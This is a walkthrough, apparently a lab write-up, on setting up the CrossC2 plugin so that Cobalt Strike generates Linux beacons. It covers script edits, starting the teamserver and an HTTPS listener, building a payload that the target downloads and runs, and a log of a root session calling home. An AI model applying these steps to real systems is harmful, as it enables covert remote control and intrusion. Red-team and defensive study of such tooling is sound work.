CS client: Windows 10
Server: Tencent Cloud server, Ubuntu 20; IP 1.1.1.1 (fake)
Test target: Tencent Cloud server, CentOS 7
Download CrossC2
GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload
Copy the src directory into the CS directory on the Windows 10 client
Download the plugin
https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Linux
https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Win.zip
Upload the genCrossC2.Linux file to the root of the Cobalt Strike directory on the Ubuntu server (some articles say this is required, so I tried putting it there first; it does no harm either way)
Then copy the hidden file .cobaltstrike.beacon_keys from the server to the client; use ls -a to see it
Extract genCrossC2.Win.zip and copy ucrtbased.dll to C:\Windows\System32
Edit the CrossC2.cna file under src:
$CC2_PATH = "D:\\Tools\\CobaltStrike4.1\\src\\"; # <-------- fix: change to the absolute path where CrossC2.cna is stored
$CC2_BIN = "genCrossC2.Win.exe"; # the client is Windows 10, so point this at the Windows binary
sub genCrossC2 {
    $dialog = dialog("CrossC2 Payload Generator", %(uri => "/a", lport => "55413", type => "curl", beaconKey => "./.cobaltstrike.beacon_keys", rebind_lib => "null", listener => "Listener: ", system => "System: ", arch => "Arch: ", payload_type => "Payload_Type: ", outputFileName => "CrossC2-test"), &dialogCallBack);
    # Line 212: change the trailing outputFileName => "/tmp/CrossC2-test" to outputFileName => "CrossC2-test"
    # Windows 10 has no /tmp directory, so CS writes the generated payload file directly to the root directory
ubuntu@VM-0-9-ubuntu:~/CobaltStrike4.1$ ls -a
. agscript c2lint cobaltstrike cobaltstrike.bat CobaltStrikeCN.jar cobaltstrike.store genCrossC2.Linux peclone teamserver third-party
.. agscript.bat c2lint.bat cobaltstrike.auth .cobaltstrike.beacon_keys cobaltstrike.jar data logs peclone.bat teamserver.bat
Starting Cobalt Strike!!!
Start the server: chmod +x teamserver # grant execute permission on the first run
sudo ./teamserver 1.1.1.1 password
[*] Will use existing X509 certificate and keystore (for SSL)
[+] Team server is up on 50050
[*] SHA256 hash of SSL cert is: 57fc0fac31c57fc0fac31c57fc0fac31c57fc0fac31c57fc0fac31c
[!] Web Server will use default SSL certificate (you don't want this).
Use a valid SSL certificate with Cobalt Strike: https://www.cobaltstrike.com/help-malleable-c2#validssl
[+] Listener: cs4.1 started!
Start the client: double-click cobaltstrike.bat to launch it
Host is the server address, the port defaults to 50050, the username can be anything, and the password is the password set above
Top right: Cobalt Strike -> Listeners -> click Add at the bottom to add a listener; the CrossC2 listener only supports HTTPS
Cobalt Strike -> Script Manager -> Load, select the CrossC2.cna file
A CrossC2 button now appears at the top of the client
Click CrossC2 -> CrossC2 Payload Generator -> genCrossC2 to generate the payload
In the fourth row choose the file: select the path where cobaltstrike.beacon_keys is stored, change listener to the HTTPS listener just added, and click Build
Copy the command to the target and run it
The target downloads and executes the payload automatically
Check the log: the session came online
08/10 11:58:56 *** new ssh session root *@10.0.4.7 (VM-4-7-centos(23687))
Done
Enter the beacon
ssh> sleep 0
[*] Tasked beacon to become interactive
[+] host called home, sent: 16 bytes
ssh> shell id
[*] Tasked session to run: id
[+] host called home, sent: 11 bytes
[+] received output:
uid=0(root) gid=0(root) 组=0(root)